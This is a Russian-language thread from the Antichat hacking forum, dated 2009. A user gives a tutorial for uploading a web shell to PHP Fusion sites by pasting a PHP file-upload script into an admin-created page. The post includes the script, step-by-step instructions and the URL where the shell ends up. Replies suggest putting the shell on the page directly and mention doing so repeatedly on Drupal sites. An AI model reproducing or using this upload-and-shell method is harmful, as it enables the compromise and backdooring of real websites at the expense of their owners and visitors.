Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Залив Шелла на Двиг PHP Fusion через Админку! |
12.12.2009, 14:38
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме:
706093
Репутация:
97
|
|
Залив Шелла на Двиг PHP Fusion через Админку!
Привет АчаТу! 5 дней искал способ заливки шелла на сайт с двигом PHP Fusion (версии от 6.**.** до 7.**.**) и нашёл!
• Итак что нам надо?
- Нам нужны админские права (Админа/Супер Админа);
- И вот мой скриптик вам пригодится:
PHP код:
<?php
$uploaddir = 'images/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is Valid, and was Successfully Uploaded! ;)\n";
} else {
echo "File Uploading Failed! ;(\n";
}
?>
<form name="upload" action="viewpage.php?page_id=" method="POST" ENCTYPE="multipart/form-data">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="UpLoad">
</form>
• Что дальше?
- Заходим на сайт куда нада залить шелл, вводим логин/пароль админа;
- Далее щёлкаем "Панель администратора" в появившемся окне щёлкаем "Страницы";
- Далее мы временно создаем страницу, придумайте название, а вот в форму содержания вставьте код который я показал и нажимаем "Сохранить Страницу";
- После сохранения вам выдаст такое: "Страница добавлена. Ссылка на эту страницу: viewpage.php?page_id=XXX", где XXX - номер страницы.
- Далее находим нашу страницу под названием которым мы её сохранили, нажимаем "Изменить" и в коде в строке "viewpage.php?page_id=XXX" заменяем XXX на те цифры которые нам показало первый раз при сохранении нашей страницы;
- Далее щёлкаем по выданной ссылке нашей страницы;
- Щёлкаем кнопку "Обзор" указываем путь до шелла и жмём кнопку "UpLoad".
- После нажатия на "UpLoad" если выдаст сообщение:
\ "File Uploading Failed! ;(" - значит не удалось залить шелл, тут либо прав нет на запись на сайт, либо вы чтото сделали не так!)
\ "File is Valid, and was Successfully Uploaded!  " - это значит заливка удалась и мы идёт открывать шелл! Шелл будет располагаться по следующему пути:
Код:
http://site.com/images/Имя_Вашего_Шелла.php
- Если вы знаете другую папку на которой в большенстве случаев CHMOD 777 тогда вы можете изменить путь по умолчанию на неё, для этого вам нужно в моём коде изменить строку на свою папку:
Код:
$uploaddir = 'images/';
• Если Вам помог мой способ помогите и мне! Поставь + -сы не желей! =)
Author: © SuNDowN - Просить плюсы нельзя (c) Ctacok
Последний раз редактировалось Ctacok; 13.12.2009 в 07:27..
|
|
|
12.12.2009, 15:05
|
|
Познающий
Регистрация: 29.05.2009
Сообщений: 55
Провел на форуме:
807573
Репутация:
7
|
|
если сразу сохранить php-shell ?, вместо твоего скрипта ))
|
|
|
|
12.12.2009, 15:16
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме:
706093
Репутация:
97
|
|
Сообщение от Dark_cracker
если сразу сохранить php-shell ?, вместо твоего скрипта ))
а ты попробуй! это редкость если получится сразу шелл запустить с этой страницы!
|
|
|
|
12.12.2009, 15:20
|
|
Познающий
Регистрация: 29.05.2009
Сообщений: 55
Провел на форуме:
807573
Репутация:
7
|
|
а ты попробуй! это редкость если получится сразу шелл запустить с этой страницы!
если твой скрипт запустился , значит и шел запуститься я так много раз заливал , только на друпал...
|
|
|
|
15.12.2009, 23:57
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от SuNDowN
128 просмотров! Хоть один отписал помогло или нет!)
Тебе уже сказали,тут проще залить шелл.Темболее,я лично об этом способе знал,только лил сразу шелл.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
